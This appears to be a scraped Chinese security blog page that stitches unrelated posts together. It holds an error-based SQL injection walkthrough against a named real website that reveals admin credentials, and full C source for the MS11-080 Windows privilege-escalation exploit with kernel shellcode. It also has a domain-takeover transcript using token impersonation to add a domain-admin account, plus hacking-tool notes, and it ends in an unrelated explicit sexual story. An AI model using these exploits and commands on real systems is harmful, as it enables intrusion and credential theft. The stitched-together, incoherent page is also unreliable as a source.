Extract Value

I'll be using this site as an example.

Version (ExtractValue)

This will return our XPATH Syntax error, and give us our version.
This is what my link looks like.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,version()))--

You should get your version.

Getting The Tables (Extract Value)

Code:+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema. ​tables+where+table_schema=database()+limit+0,1)))--
My link looks like this.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from ​+information_schema.tables+where+table_schema=database()+limit+0,1)))--

So lets load it up and see if we get our first table name!

Code:

XPATH syntax error: '~pdigclicks'
Woot it worked! Now we just increment in our limit statement until we find our table we want columns from.

(#‵′)凸
We want users or admin..
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from ​ +information_schema.tables+where+table_schema=database()+limit+[b]2[/b],1)))--

Code:

XPATH syntax error: '~pdigexcludes'

Woot, now let's get the columns.

Getting The Columns (ExtractValue)
First off, we want to convert our table name to hex.
My table name was tbladmin.
Whenever you convert something to hex, you add 0x in front of it.
It tells the site to read the hex value.
The hex of tbladmin is 74626c61646d696e
So it should look like this.
Code:0x74626c61646d696e
Now to get our columns, we change our syntax a bit, but it's still generally the same idea.
Code:+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema ​.columns+where+table_name=0xTABLE_HEX+limit+0,1)))--]
Of course, replace TABLE_HEX with the hex value of your table name.
My link looks like this.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+column_name+fro ​ m+information_schema.columns+where+table_name=0x74626c61646d696e+limit+0,1)))--

Now use increment in your limit statement until you find the columns you want.

Getting Data Out of Columns (ExtractValue)

Now that you've got your column names, you're going to want to put them in a concat statement.

Code:+and+extractvalue(rand(),concat(0x7e,(select+concat(column1,0x7e,column2)+from+T​ABLENAME+limit+0,1)))--
My columns I wanted were username and password, the 0x7e is the hex value of "~" which I'll use as a seperator.
My link looks like this.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+concat(username ​,0x7e,password)+from+tbladmin+limit+0,1)))--
And as you can see, we get our XPath error with the admin login.

Code:XPATH syntax error: '~ishir~ishir123'

UpdateXML

Getting The Version (UpdateXML)

My link looks like this..

We get our XPATH Error that returns the version.
Code:

Getting The Tables (UpdateXML)

My link looks like this..

Code:

Now we know our first table is called pdigclicks. Let's see what else is in here....
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+ ​ from+information_schema.tables+where+table_schema=database()+limit+1,1))),0)--

For the sake of time, I know the table name I want is tbladmin.
Code:leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+ ​ from+information_schema.tables+where+table_schema=database()+limit+10,1))),0)--
And there's our table.
Code:

Now let's get the columns from the table.

Getting Columns (UpdateXML)

Now it's the same idea, we just change the tables to columns, from the table name.

Now my table name was tbladmin, so I convert that to hex and get 74626c61646d696e

My link looks like this.

Getting Data (UpdateXML)

Now once you've got your columns, concatenate them and get the from the table you want.
Code:

My link looks like this..
Code:

相关文章

• 2011年06月6日 -- Easy Media Script SQL Injection Vulnerability
• 2011年05月12日 -- Joomla Component com_hello SQL Injection Vulnerability
• 2010年06月6日 -- Havij v1.1 Advanced SQL Injection
• 2010年05月8日 -- PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)
• 2010年05月8日 -- PhpCms 2008 Sp3 Blind SQL Injection Exploit(1)
• 2010年04月14日 -- SFX-SQLi SQL2005/2008注入工具
• 2009年12月6日 -- SQL通用防注入程序 20091206版
• 2009年09月21日 -- MvMmall_V5.5.1 Blind SQL Injection Exploit
• 2009年09月4日 -- DVBBS php v2.0 boardrule.php注入漏洞
• 2009年08月28日 -- dedecms 5.3 – 5.5注入漏洞

iiscnfg /export /f c:\chinadu.xml /sp / /children /inherited

但很多情况下如果在服务器直接执行的话，会报错cscript不是默认vbs解释器(iiscnfg是个VBS文件iiscnfg.vbs),所以我们应该用cscript加参数来运行:

cscript C:\WINDOWS\system32\iiscnfg.vbs /export /f c:\chinadu.xml /sp / /children /inherited

PS:开始/sp参数后面的路径老不对，后来发现用“/”根路径就可以了，信息还更全。
详细参数请Google。

PS:
标签有网站基本配置信息
标签有网站目录配置信息和其他配置信息
其它自己看

相关文章

• 2011年11月24日 -- 域内指定用户中马
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧
• 2010年05月5日 -- 搞内网的一个小技巧
• 2010年04月22日 -- 更改windows2003最大连接数
• 2010年03月1日 -- 让千千静听不再弹出广告
• 2010年01月19日 -- 手工屏蔽迅雷技巧【禁止上传、广告、迅雷看看15秒广告】
• 2009年11月5日 -- MySQL导入数据库文件最大限制2048KB的修改解决办法
• 2009年09月22日 -- wp-postviews和Wp Super Cache有冲突
• 2009年09月22日 -- 流量过大，不得不启用WP Super Cache

/*

* MS11-080 Afd.sys Privilege Escalation Exploit

* 来源：Matteo Memelli，[url]http://www.exploit-db.com/exploits/18176/[/url]

* 改编：KiDebug，[email]Google@pku.edu.cn[/email]

* 编译：VC6.0

* 测试环境：原版Windows XP SP3，Windows 2003 SP2，普通用户

*/

#include <stdio.h>

#include <Winsock2.h>

#include <winbase.h>

#include <windows.h>

#pragma comment (lib, "ws2_32.lib")

typedef struct _RTL_PROCESS_MODULE_INFORMATION {

HANDLE Section; // Not filled in

PVOID MappedBase;

PVOID ImageBase;

ULONG ImageSize;

ULONG Flags;

USHORT LoadOrderIndex;

USHORT InitOrderIndex;

USHORT LoadCount;

USHORT OffsetToFileName;

UCHAR FullPathName[ 256 ];

} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

typedef struct _RTL_PROCESS_MODULES {

ULONG NumberOfModules;

RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];

} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );

typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );

typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );

NtQueryIntervalProfile_ NtQueryIntervalProfile;

NtAllocateVirtualMemory_ NtAllocateVirtualMemory;

NtQuerySystemInformation_ NtQuerySystemInformation;

ULONG PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;

void _declspec(naked) ShellCode()

{

__asm

{

pushad

pushfd

mov esi,PsReferencePrimaryToken

FindTokenOffset:

lodsb

cmp al, 8Dh;

jnz FindTokenOffset

mov edi,[esi+1]

mov esi,PsInitialSystemProcess

mov esi,[esi]

push fs:[124h]

mov eax,PsGetThreadProcess

call eax

add esi, edi

add edi, eax

movsd

popfd

popad

ret

}

}

void main(int argc, char **argv)

{

if (argc != 3)

{

printf("--------------------------------------\n");

printf("Usage : ms11-080.exe cmd.exe Command \n");

exit(-1);

}

HMODULE ntdll = GetModuleHandle( "ntdll.dll" );

NtQueryIntervalProfile = (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );

NtAllocateVirtualMemory = (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );

NtQuerySystemInformation = ( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );

if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )

return;

ULONG BaseAddress = 1 , RegionSize = 0x1000, status;

status = NtAllocateVirtualMemory( (HANDLE)0xFFFFFFFF, (PVOID*)&BaseAddress, 0, &RegionSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE );

if ( status )

return;

//取ntoskrnl的信息，只要调用一次就行

ULONG NtoskrnlBase;

RTL_PROCESS_MODULES module;

status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11

if ( status != 0xC0000004 ) //STATUS_INFO_LENGTH_MISMATCH

return;

NtoskrnlBase = (ULONG)module.Modules[0].ImageBase;

//把ntoskrnl.exe加载进来

HMODULE ntoskrnl;

ntoskrnl = LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );

if ( ntoskrnl == NULL )

return;

//计算实际地址

WriteToHalDispatchTable = (ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; //需要覆盖的地址

PsInitialSystemProcess = (ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;

PsReferencePrimaryToken = (ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;

PsGetThreadProcess = (ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;

//以下代码就各显神通了

if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )

return;

memset((PVOID)0x02070000,0x90,0x20000);

memcpy((PVOID)0x02080000,ShellCode,100);

WSADATA ws;

SOCKET tcp_socket;

struct sockaddr_in peer;

ULONG dwReturnSize;

WSAStartup(0x0202,&ws);

peer.sin_family = AF_INET;

peer.sin_port = htons(4455);

peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );

tcp_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )

{

//printf("connect error\n");

}

UCHAR buf1[26]= "\x41\x41\x41\x41\x42\x42\x42\x42\x00\x00\x00\x00\x44\x44\x44\x44\x01\x00\x00\x00\xe8\x00\x34\xf0\x00";

memset((PVOID)0x1000,0x45,0x108);

memcpy((PVOID)0x1000,buf1,25);

if(!DeviceIoControl((HANDLE)tcp_socket,0x000120bb, (PVOID)0x1004, 0x108, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))

{

//printf("error=%d\n", GetLastError());

}

//触发，弹出SYSTEM的CMD

NtQueryIntervalProfile( 2, &status );

printf("[>] ms11-080 Exploit\n");

printf("[>] by:Mer4en7y@90sec.org\n");

SECURITY_ATTRIBUTES sa;

HANDLE hWrite,hRead;

STARTUPINFO si;

PROCESS_INFORMATION pi;

char buf[4096];

DWORD dwReadBytes;

char lpcmd[256]={0};

ZeroMemory(buf,4096);

sa.bInheritHandle = TRUE;

sa.lpSecurityDescriptor = NULL;

sa.nLength = sizeof(SECURITY_ATTRIBUTES);

if(!CreatePipe(&hRead,&hWrite,&sa,0))

{

printf("[>] create pipe error\n");

}

si.cb = sizeof(STARTUPINFO);

GetStartupInfo(&si);

si.hStdError = hWrite;

si.hStdOutput = hWrite;

si.wShowWindow = SW_HIDE;

si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;

strcat(lpcmd,"/c ");

strcat(lpcmd,argv[2]);

if(!CreateProcess(argv[1],lpcmd,NULL,NULL,TRUE,0,NULL,NULL,&si,&pi))

{

printf("[>] create porcess error\n");

}

CloseHandle(hWrite);

while(dwReadBytes!=0)

{

WriteFile(hWrite,"test1",6,&dwReadBytes,NULL);

ZeroMemory(buf,4096);

ReadFile(hRead,buf,4096,&dwReadBytes,NULL);

printf("%s\n",buf);

}

return;

}

随机日志

• 2010年04月15日 -- 某校长很精辟的演讲
• 2008年11月21日 -- 把实况足球玩成了一种艺术
• 2008年11月20日 -- Slax 6.07 官方迅雷高速下载
• 2006年09月29日 -- URL欺骗初探
• 2009年07月23日 -- 无线Hacking必备工具
• 2010年01月22日 -- 5800备份和恢复资料
• 2009年12月11日 -- 【转载】我和老公的那些害羞事儿
• 2008年10月13日 -- PHPWind后台通用拿WEBSHELL
• 2006年12月11日 -- 超级多韩国高清晰MV集合 需要eMule下载
• 2008年11月5日 -- Discuz! member.php xss bug

You can also browse the network neighborhood or use the net view command.

Aquiring and cracking the hashes of your target is generally useful as well.

Enumerate group membership so you know who to target.

Get the usernames in the local administrators group:

C:WINDOWSsystem32>net localgroup administrators
net localgroup administrators
Alias name  administrators
Comment     Administrators have complete and unrestricted access to the computer/domain

Members
--------------------------------------
Administrator
BLACKHATDomain Admins
hacked
local_valsmith
root
The command completed successfully.

Enumerate the domain admins

C:WINDOWSsystem32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain blackhat.com.

Group name   Domain Admins
Comment      Designated administrators of the domain

Members

---------------------------------------------------
admin_valsmith      Administrator
The command completed successfully.

So admin_valsmith is our target domain admin. Lets say the workstation we hacked is on 172.16.1.10. We now need to find out of there are any security tokens we can access.

c:incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 list_tokens -u
[*] Attempting to establish new connection to \172.16.1.10IPC$
[*] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-FC12020A7EED}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Listing unique users found...

Delegation Tokens Available
==========================================
NT AUTHORITYLOCAL SERVICE
NT AUTHORITYNETWORK SERVICE
NT AUTHORITYSYSTEM
XPCLIENTlocal_valsmith

Impersonation Tokens Available
==========================================
BLACKHATadmin_valsmith
NT AUTHORITYANONYMOUS LOGON

[*] Service shutdown detected. Service executable file deleted
[*] Deleting service

So admin_valsmith is our target domain administrator and an impersonation token is available to us!

The above command assumes we have cracked the hash of the local admin and retrieved the password. This will connect to IPC$ share on the target and list any tokens that are available.

Next we will utilize this token to gain domain admin rights:

C:incognitoincognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 execute -c "blackhatadmin_valsmith" cmd

[*] Attempting to establish new connection to \172.16.1.10IPC$
[+] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-9047A294CE6D}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Searching for availability of requested token
[+] Requested token found
[-] No Delegation token available
[*] Attempting to create new child process and communicate via anonymous pipe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>whoami
whoami
admin_valsmith

So we now have a shell with the rights of the domain administrator. We will add an account to the domain controller to demonstrate our access:

C:net user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.

The command completed successfully.

Now we want to add our account to the domain admin group. NOTE: often you don’t want to add an account, especially one named hacked as it is likely to be discovered by the admins.

C:net group "domain admins" hacked /add /domain
net group "domain admins" hacked /add /domain
The reuqest will be processed at a domain controller for domain blackhat.com

The command completed successfully.

At this point we have control over the domain and can likely log into any workstation which is on the domain.

Some further related reading:

One token to Rule them All: Post-Exploitation Fun in Windows Environments

Security implications of windows access tokens

Meta-Post_Exploitation.pdf

相关文章

• 2011年11月24日 -- allinone: Linux pentest tools
• 2011年11月24日 -- Citrix密码绕过漏洞引发的渗透
• 2011年11月24日 -- 域内指定用户中马
• 2011年04月28日 -- 哈希注入工具wce
• 2010年07月17日 -- 渗透某大型内网入侵过程
• 2010年04月29日 -- 域环境下的渗透
• 2010年04月23日 -- 专业渗透人员在渗透过程中注意事项
• 2009年08月27日 -- Infiltrating a Botnet
• 2009年08月24日 -- How to attack a windows domain
• 2009年07月1日 -- web和数据库分离的渗透思路

SSHscan.py will allow you to scan a internal network through a SSH with port forwarding enabled. The tool allows to create a port forward in localhost for every open port detected in the internal network range.

This tool is not one that can be used in every engagement but when you have the opportunity and the need it will came handy.

The tool has been included in the edgeSSH kit, where we will include all the scripts related with SSH, at the moment only bruteSSH, a SSH login bruteforcer and scanSSH are included in the kit.

You can download the code here: http//code.google.com/p/edgessh

Command line options:        -h: target host       -u: username       -p: password       -l: targets lists to scan       -t: threads       --remote-host: host to scan       --remote-ports: port list to scan       --default-ports: scan default ports       --all-ports: scan all 65535 ports       --keep-tunnels: Forward all open ports

Examples:

    scanssh.py -h 192.168.1.55 -u root -p passowrd -t list.txt    scanssh.py -h 192.168.1.55 -u root -p password --remote-host 127.0.0.1 --remote-ports 80,443    scanssh.py -h 192.168.1.55 -u root -p password --remote-host 127.0.0.1 --default-ports

[source: http://edge-security.blogspot.com/2011/06/scanning-ports-through-ssh-port.html]

随机日志

• 2010年04月20日 -- 无线安全惊叹内幕 公共Wi-Fi如何确保安全
• 2008年10月15日 -- 假如对方是个BT 之 \ 被过滤
• 2009年12月14日 -- Linux下渗透嗅探术
• 2009年06月25日 -- sa权限下无xp_cmdshell下取权限又一简单方法
• 2008年11月8日 -- 很雷人的：卫生棉花糖
• 2008年11月4日 -- Discuz! admin\runwizard.inc.php get-webshell bug
• 2009年01月24日 -- VMware漏洞实例分析之一 – 共享文件夹目录遍历漏洞
• 2007年05月21日 -- 入侵检测系统逃避技术和对策的介绍
• 2009年08月16日 -- Gmail超过AOL成美国第三大Web邮件服务商
• 2008年11月27日 -- 攻击CISCO路由器的详细步骤

Web目录下有一些文件不允许匿名访问（可以使用Tomcat、Apache、nginx等进行配制，来实现此效果），如下图：

可以使用以下代码+字典破解，运行结果如下：

主要代码如下（附件中有完整代码，仅供学习！请勿非法使用！）：

点击下载：Crack_pass.rar

随机日志

• 2007年05月1日 -- 利用系统漏洞替换目标网站网页并加入恶意代码
• 2006年09月22日 -- NetCat 网络飞猫 Version2.00
• 2008年07月18日 -- 解决迅雷偷偷上传的办法
• 2008年10月30日 -- NetCat Perl 版
• 2008年10月29日 -- MS08-067漏洞的触发条件
• 2009年06月25日 -- Kill 360Safe 完整版（VC版）
• 2010年04月1日 -- 娱乐一下
• 2008年09月6日 -- 让网马原代码隐藏
• 2011年06月4日 -- Nginx https 免费SSL证书配置指南
• 2006年09月25日 -- 又一交友系统漏洞

苏枂是个BIAO子，认识她的每一个人都知道这一点。第一次见苏枂是在一次朋友聚会中，当苏枂穿着一身粉红色的运动装推门而入的时候，我的眼睛都看直了。兄弟鸭子悄悄捅了捅我，在我耳边低声说道：“别看了，那是个BIAO子，外表看着单纯，实际上只要给钱，什么都做。”我无法形容当时我心里的巨大落差，这么清纯漂亮的女孩居然是个BIAO子，看来女人真的不能光从外表判断，如果鸭子不说，我还以为苏枂是个纯情的CN。我问鸭子：“你上过她么？”鸭子说：“当然没有，我从来没有花钱艹B的习惯。其实那个BIAO子不是那种洗头房里的BIAO子，她今年大三，是那种楼FENG一样的女人，你需要了，联系她，给她钱，然后她就来满足你。”我说：“你怎么知道的这么清楚？”鸭子说：“她的好朋友是我以前的女人。”

我看着苏枂，她走到桌前坐下，然后和我的一个朋友打招呼。苏枂笑起来很美，牙齿很白，嘴唇很红，苏枂笑起来眼睛会弯成好看的弧度，长长地睫毛，还有胸前那若有若无的沟。我点了根烟，感叹道：“这么美的女人，居然是一个BIAO子。”

吃饭的时候，我们挨个碰杯，碰到苏枂时，我说：“美女，看你好眼熟，好像在哪见过你，来，交个朋友。”苏枂脸红了，在我眼里这却是故作害羞。和我喝了酒之后，在接下来的时间里，苏枂不时的偷偷看我。我知道她心里怎么想的，她肯定以为我是以前花钱CAO过她的男人中的一个，而她现在记不起来了。我笑了笑，看着她。她立马低下头。“BIAO子。”我在心里这样说道。

吃完饭大家去唱歌，苏枂也去了，昏暗的包厢里，一群被酒精麻醉的年轻人疯狂地载歌载舞，而我却坐在一边，抽着烟，端详着黑暗里的苏枂。我承认我对她有性趣了，不过这种性趣仅限于GAN她一次。终于，苏枂起身，应该是去洗手间，而我也跟在她身后。出了包厢，我站在洗手间门口等苏枂。苏枂出来了，我喊她：“苏枂，来一下，找你有个事。”苏枂疑惑的看着我，不过还是跟着我走到一间没开的黑暗包厢里。进了包厢，我突然关了门，苏枂被我吓了一跳，问道：“你干嘛？”

我点了根烟，笑道：“不干嘛，你为什么不问问我，怎么知道你名字的？还有，你为什么不问问我，为何说看你面熟？”苏枂愣了一下：“你说。”我继续笑着：“因为你上次把我伺候的不错呀！你觉得还能是为什么？”苏枂：“什么伺候的不错？”我说：“别装了，清纯的楼FENG。”然后苏枂不说话了。我接着问道：“今晚陪我，多少钱你说。”苏枂冷笑了一下，问：“去哪？”我说：“去我宿舍。”苏枂说：“可以。”然后我用手从后面轻轻地掐住苏枂的脖子，吸了口烟，吻了她一口。

我承认那晚发生的事，包括我找苏枂，完全是酒精的作用，不过必须要说的是，苏枂长得清纯漂亮也是很重要的一个因素。回包厢之前，我要了苏枂的手机号码。然后在别人疯狂唱歌宣泄的时候，我和苏枂静静地发着信息。我说：“待会儿结束了，你就说跟我同路，然后我们坐车一起走。”苏枂说：“好的。”结束时，大家意犹未尽，要去吃烧烤。我说我不去了，苏枂也说太晚了，然后我故意问苏枂回哪里，苏枂说回学校，我说那正好我们同路，我带你。然后我们上了车。

回到家，我和苏枂进了门，然后我说一起洗个澡吧。苏枂说：“不，不习惯和男人一起洗澡。你先洗。”然后我先进了浴室。温暖的水柱打在我身体上，我却迫不及待地三下五除二搞定一切擦干身子，出来之后我对苏枂说：“你去洗吧。”苏枂嗯了一声，进了浴室。半个小时之后，在我快要睡着时，苏枂终于出来了，一丝不挂地靠在我怀里，然后我说：“开始吧，让我爽爽。”苏枂没说话，只是顺从地起身，跪在我两腿之间。那种初次乖巧的温暖使我至今回忆起来仍然感觉很刺激很舒服。我点了根烟，享受着这一刻的快感。差不多的时候，我叫苏枂起来，然后将她压在身下。

那晚酒确实喝多了，以至于我们用了五个姿势我还没射出来，苏枂声嘶力竭地喘息。最终我射出来之后，我们已经精疲力竭。苏枂躺在我怀里，我抽着烟。房间里静静的，仿佛梦醒一般。过了会儿，苏枂说话了：“跟你说个事。”我随口说道：“多少钱？”苏枂说：“不是。你知不知道，我想了很久，我没有为你服务过。而且，但凡我服务过的男人，都不知道我的真名。”说完之后，苏枂疲倦地闭上眼睛。我头脑片刻空白。

第二天的阳光特别好，洒在苏枂的背上，看起来很美。我抽着烟，等待着苏枂的醒来。一根烟抽完，苏枂醒了，看着我，问我：“昨晚舒服么？”我说：“挺好，就是很累。”苏枂说：“有没有吃的？我饿了。”我说：“给你钱你自己买吧。昨晚多少钱？”苏枂说：“你不是知道的吗？老主顾。”我笑了笑，说：“你说吧。”苏枂说：“500。”我拿出钱包给了钱。然后苏枂说：“谢谢。”苏枂起身时我问她：“你既然知道我以前没找过你，昨晚为什么答应陪我？”苏枂说：“因为缺钱。”
苏枂走后我笑了，自己怎么这么笨，她是个BIAO子，只要有钱赚当然愿意了。电话响了，是鸭子：“昨晚爽不爽？那个BIAO子服务质量怎么样？”我说：“挺好。”鸭子笑了：“收你多少钱？”我说：“500。”鸭子说：“这么便宜！我听说她一般没有1000不出去。”我说：“可能是因为我让她也爽到了吧。哈哈。”鸭子说：“JIAN 货。下午有空没？出来打机！”

从那之后很长一段时间没见过苏枂，中间搞了几个女人，不过都没有那晚和苏枂尽兴。直到圣诞节，和鸭子他们几个朋友聚会，又看见了苏枂。那晚苏枂穿着黑丝，长长的靴子，上身是闪亮的皮衣。坐在我身边的苏枂对我笑了一下，像老朋友一样问我这段时间过得怎么样，我说还好，只是再也没有像那晚那样舒服了。然后苏枂不轻不重给了我一拳。我问她今晚有没有空，她说没空，已经被人预定了。我问她那个人会给你多少钱？苏枂说：“这不是钱不钱的事，这是关乎于诚信。”听听，一个BIAO子居然给我上诚信课！我说：“那你到时候跟他GAO完了再来陪我，怎么样？”苏枂说：“不干，太累。”然后我说：“那就对不起了，你今晚哪儿也去不了。我今晚SHANG定你了。”每次聚会都是那样的老程序，吃饭，唱歌，吃烧烤。以至于吃完饭大家去唱歌时，我拉着苏枂先闪了。苏枂说你带我去哪啊？我说随便走走。出了饭店，天开始下雪了。苏枂显得很兴奋，像小孩子一样。苏枂挽着我的胳膊大声对我说：“你看你看下雪了！”我说：“下雪了又怎样？”苏枂说：“下雪好啊！”我问她：“哪里好？”苏枂说：“反正就是好！我喜欢下雪！特别是圣诞夜！”我说：“那你想要什么样子的圣诞礼物呢？”苏枂说：“不知道。”我点了根烟，对她说：“给你一分钟时间想想，我满足你。”

苏枂仰望着夜空，开始开动脑筋思考起来。最后苏枂说：“我想去情人湾看焰火！”我说：“可以。”苏枂拉着我：“我还没说完！我还想吃棉花糖！”我说：“情人湾有卖棉花糖的么？”苏枂看着我：“嗯！”她的眼睛弯成了好看的弧度。我们上车去情人湾，到的时候焰火已经开始了。苏枂拉着我一路小跑，跑到湖边的拉杆前，仰头看着焰火。我说：“你等我一下。”然后去旁边的棉花糖小商铺给她买了一个大大的棉花糖。当我把棉花糖给苏枂的时候，苏枂看着棉花糖，然后单手搂住我吻了我一口。我心想：“这个BIAO子，挺能装纯。”
看完焰火，我们坐在湖边的咖啡厅里，我问苏枂：“为什么会想到来看焰火？”苏枂说：“没什么。”我说：“说呀。”苏枂说：“因为我朋友的男朋友每个圣诞节都带她来这里。她说很浪漫，还说这里的棉花糖既可爱又好吃。”我说：“那你叫你男朋友带你来不就得了。”苏枂看着我：“你觉得我会有男朋友吗？”我笑了笑，没说话。苏枂说：“今晚谢谢你，晚上我陪你。”我笑了笑：“好啊~”

回到家，苏枂出乎意料地和我一起洗澡。我坐在浴缸里，苏枂坐在我对面。她的手很柔软，让我不住地兴奋。然后她直接在浴缸里给我KOU交了。洗完澡，我们回到床上，苏枂仔细地吻我，搂着我，然后自己坐到我身上。那个夜晚在我记忆里比第一次和苏枂ZUO爱还舒服。苏枂紧紧地抱着我，在我脖子上狠狠地吻着，咬我，然后在我背上抓来抓去。最后我在最温暖的地方倾泻而出，苏枂紧紧地勒住我，我们就那样保持了很长时间。当我们双双躺倒在床上时，午夜的钟声响了。苏枂搂着我：“这是我过过的最美好的一次圣诞节。”我说：“我也是。”

我抽着烟，问苏枂：“今晚还是500吧？”苏枂抬头看了看我，又躺在我的胸口：“不要钱。”我说：“这么好？”苏枂说：“今晚我是你女朋友，好不好？”我说：“为什么呢？”苏枂说：“不知道。也许仅仅是因为你带我去看焰火了，当我最开心的时候，在我身边的人是你。”我抚摸着她的头，无意中说了一句：“你要不是一个BIAO子那该有多好。”话一说完苏枂立马看着我，没有愤怒没有委屈，很平淡，带着浅浅的笑。苏枂说：“难道在今晚，在你心里我依然是个BIAO子吗？”我移开目光，抽着烟。然后苏枂又贴在我胸口，幽幽地说道：“你刚才那句话真让人寒心。”

半夜的时候，我起来niàoniào，回来时看见赤LUO的苏枂，看见她的身材，看见她可爱的面容，心里又SE心大起，上CHUANG抚卝mō卝着苏枂的背，wěn了起来。苏枂有点感觉了，但还没醒来。我下面已经YING了。我将苏枂翻过身来，分43232开两卝tuǐ，轻轻地CHA入。当时感觉好刺卝激，尤其是在我CHOU擦时，苏枂的腰不断地扭来扭去，双RU像小豆腐一样抖动着，那样的情景太刺卝激人！最后在我的冲击下，苏枂终于醒来，当她醒来时，我正在发射。那一次我依然SHE了好多，我趴在苏枂身上，苏枂双臂环绕着我的脖子，然后wěn我。wěn完之后，苏枂说：“我做你情人好么？”我说：“为什么是情人而不是女朋友？”苏枂说：“你会找一个BIAO子做女朋友么？”我无言，苏枂接着wěn我。

从那以后，差不多每隔半个月，苏枂就会来陪我一次，每次我都会带她出去玩，吃东西，打机，等到我们玩累了，再回家，苏枂会温柔的陪伴我。有几次我给苏枂钱，苏枂却说：“不用，说好我是你情人，再说我也不缺你这几百块钱。”对啊！苏枂是个BIAO子，人家一个星期赚的钱比我一个月赚的都多，人家怎么会看中我这几百块钱？也许她只是喜欢有人陪的感觉吧。有时我们会聊天，但从来不聊各自的情况，因为苏枂只是我的工具，带给我欲望的满足，而我也只是苏枂的工具，排遣她某些时候的孤独。日子就这样一天一天的过着。

1月11号，也就是小光棍节那天，下午我发信息给苏枂，问她晚上有没有空。苏枂回复道晚上有事。我问：“什么事？”苏枂：“你说呢？”然后鸭子打电话给我，说晚上出去聚聚。到了晚上，我和鸭子一群人在一起吃饭。吃饭的时候，鸭子问我：“听说你跟那个苏枂走的很近？”我说：“彼此需要而已。”鸭子笑了：“你不会喜欢上那个BIAO子了吧？！”我说：“怎么会。BIAO子无情，这点常识我还是懂的。再说我又不是纯情小处男，怎么会和那样一个BIAO子坠入情网。”

吃完饭，我们一群人去打机抓小鱼。那晚我的手气不错，赢了好几百。正准备继续时，手机响了。我一看是个陌生号码，便接了电话。刚开始听不清，因为游戏厅太嘈杂，我只得走出门外，然后一听，是苏枂。苏枂那边很安静，然后苏枂问我在哪，我说在外面玩呢。苏枂问我：“那你现在有空么？”我说有啊！你在哪？苏枂说：“我在城市之家605，你过来，快点。”挂了电话，我笑了笑。这个小BIAO子，我约她出来不出来，现在却自己开好房间等我过去！看我今晚怎么收拾你！

